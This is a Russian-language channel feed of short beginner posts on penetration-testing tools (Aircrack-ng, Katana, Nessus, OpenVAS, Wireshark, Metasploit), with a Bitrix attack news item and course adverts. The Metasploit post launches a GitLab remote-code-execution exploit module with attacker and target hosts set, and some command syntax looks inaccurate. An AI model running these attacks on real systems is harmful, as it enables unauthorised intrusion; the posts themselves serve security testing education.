Linux для чайника

2023-06-28 14:02:09 Какие утилиты включает в себя Aircrack-ng?

1. Airodump-ng - утилита, которая используется для сбора пакетов с беспроводных сетей.

2. Airmon-ng - утилита, которая используется для управления беспроводными интерфейсами.

3. Aireplay-ng - утилита, которая используется для генерации трафика для сбора пакетов.

4. Aircrack-ng - утилита, которая используется для взлома защищенных беспроводных сетей.

5. Airdecap-ng - утилита, которая используется для декодирования зашифрованных пакетов, полученных с помощью Airodump-ng.

6. Airserv-ng - утилита, которая используется для запуска беспроводного сервиса на карте.

7. Airtun-ng - утилита, которая используется для создания беспроводных туннелей. Открыть/Комментировать

2023-06-28 12:03:13 С начала июня 2023 года «Инфосистемы Джет» зафиксировали большое количество кибератак на российские веб-сайты, использующие CMS Bitrix

Атакующие загружают на сайт вредоносное программное обеспечение и достигают разных целей: выгрузка данных с атакованного ресурса, дефейс сайта, повреждение данных и прочее. По результатам расследований, проведенных специалистами Jet CSIRT, злоумышленники получали доступ к уязвимым системам за 3–6 месяцев до факта публикации полученных данных.

Причина подобных атак — длительное игнорирование обновлений компонентов сайта. Производитель платформы «1C Битрикс» призывает своих клиентов внимательно относиться к безопасности сайтов и своевременно обновлять программное обеспечение.

Технические детали угроз, а также рекомендации по устранению можно получить в бюллетене безопасности. Открыть/Комментировать

2023-06-27 12:03:10 Что такое Aircrack-ng?

Aircrack-ng - это набор утилит для анализа и взлома беспроводных сетей, который позволяет тестировать безопасность WiFi-сетей, искать уязвимости и проводить атаки на точки доступа.

1. Откройте терминал.
2. Убедитесь, что у вас установлены все необходимые пакеты:
sudo apt-get install build-essential libssl-dev libnl-3-dev libnl-genl-3-dev ethtool.
3. Скачайте Aircrack-ng с официального сайта:
wget https://download.aircrack-ng.org/aircrack-ng-1.6.tar.gz.
4. Распакуйте архив:
tar -zxvf aircrack-ng-1.6.tar.gz.
5. Перейдите в директорию Aircrack-ng:
cd aircrack-ng-1.6.
6. Выполните команду sudo make для сборки и установки утилит Aircrack-ng.
7. Дождитесь окончания процесса сборки.
8. Выполните команду sudo make install для установки утилит в систему.
9. После установки вы можете запустить Aircrack-ng, вызвав любую из его утилит через терминал. Открыть/Комментировать

2023-06-26 12:03:26 Набор инструментов для тестирования Katana

Katana - это набор инструментов, который предназначен для Kali Linux. Включает в себя более 100 инструментов, которые позволяют проводить тестирование безопасности сетей и приложений.

Чтобы установить Katana на Kali Linux, нужно выполнить несколько шагов:

1. Откройте терминал и выполните следующую команду:
git clone https://github.com/PowerScript/KatanaFramework.git

2. Перейдите в папку KatanaFramework:
cd KatanaFramework

3. Установите необходимые зависимости:
sudo ./dependencies

4. Запустите Katana:
sudo python katana.py

После этого откроется графический интерфейс, который позволит вам выбрать необходимый инструмент для проведения тестирования на проникновение. Открыть/Комментировать

2023-06-24 12:01:25 Использование Nessus для сканирования уязвимостей и обнаружения угроз безопасности

Nessus - это инструмент для сканирования уязвимостей сети, который обнаруживает уязвимости с помощью сканирования сети и анализа результатов.

Команда для запуска Nessus:
systemctl start nessusd

Затем мы можем создать новое сканирование и запустить процесс сканирования на целевом устройстве:
nessuscli scan new “Сканирование цели” -t 192.168.1.20
nessuscli scan launch -n “Сканирование цели” Открыть/Комментировать

2023-06-23 17:03:24 Использование OpenVAS для сканирования уязвимостей

OpenVAS - это инструмент для сканирования уязвимостей, который предоставляет множество готовых проверок безопасности и позволяет автоматически сканировать веб-сервера, базы данных и другие уязвимые системы.

Команда для запуска OpenVAS:
systemctl start openvas-scanner && systemctl start openvas-manager && systemctl start gsad

Затем мы можем добавить новую цель и запустить сканирование:
omp -u admin -w admin -G --target=192.168.1.20
omp -u admin -w admin -T 192.168.1.20 -m scan Открыть/Комментировать

2023-06-23 15:02:03 3 из 5 компаний уже перешли с Oracle и MS SQL на PostgreSQL.

PostgreSQL хорошо выполняет сложные запросы и позволяет создавать высокодоступные отказоустойчивые и параллельные кластера под "тяжелые" задач

  PostgreSQL — навык, открывающий двери в более интересные и перспективные проекты.

Протестируйте обучение на открытых уроках:

Хранимые процедуры и функции в PostgreSQL, 4 июля в 20:00
Разберем основы разработки элементов серверной логики. SQL и Pl/Pgsql
https://otus.pw/KNea/

  Хранимые процедуры и функции в PostgreSQL — дополнительные возможности, 18 июля в 20:00
Рассмотрим использование ненативных языков для написания хранимых процедур и функций в PostgreSQL на примере С и Python
https://otus.pw/6o0T/

Нативная интеграция. Информация о продукте www.otus.ru Открыть/Комментировать

2023-06-23 12:02:55 Поиск уязвимостей в сети с помощью Wireshark

Wireshark - это инструмент для анализа сетевого трафика, который позволяет проверять данные, проходящие через сеть, и находить уязвимости.

Команда для запуска Wireshark:
wireshark

Затем мы можем выбрать сетевой интерфейс и начать захват пакетов:
sudo wireshark -i eth0

После этого мы можем анализировать захваченные пакеты и искать уязвимости в сети. Открыть/Комментировать

2023-06-22 15:02:49 Пройдите увлекательный тест по Linux, ответьте на 20 вопросов и проверьте, насколько вы готовы к обучению на курсе — «Administrator Linux. Professional»

На курсе вас ждут все необходимые навыки системного администратора — умения гибко рулить системой, создавать и изменять RAID массивы, управлять логическими томами, работать с памятью, процессами, дисками, файлами, баш-скрипты и применение подхода Infrastructure as code.

А также вы получите практические навыки в решении типовых задач администрирования. Практика проходит в режиме реального времени на виртуальных стендах

Пройти вступительный тест — https://otus.pw/8s7l/

Пройдете тест, получите курс по Git и доступ к 2 открытым урокам курса.
Возможна оплата в рассрочку!

Реклама. Информация о рекламодателе на сайте www.otus.ru Открыть/Комментировать

2023-06-22 12:01:59 Анализ уязвимостей с помощью Metasploit

Metasploit - это популярный инструмент для тестирования на прочность безопасности сетей и приложений. Он позволяет исследовать уязвимости, эксплуатировать их и управлять удаленными системами.

Команда для запуска Metasploit:
msfconsole

Затем мы можем использовать модуль, который проверит наличие уязвимости в приложении:
use exploit/multi/http/gitlab_11_4_rce

После этого мы можем настроить параметры модуля и запустить атаку:
set LHOST 192.168.1.10
set RHOST 192.168.1.20
run Открыть/Комментировать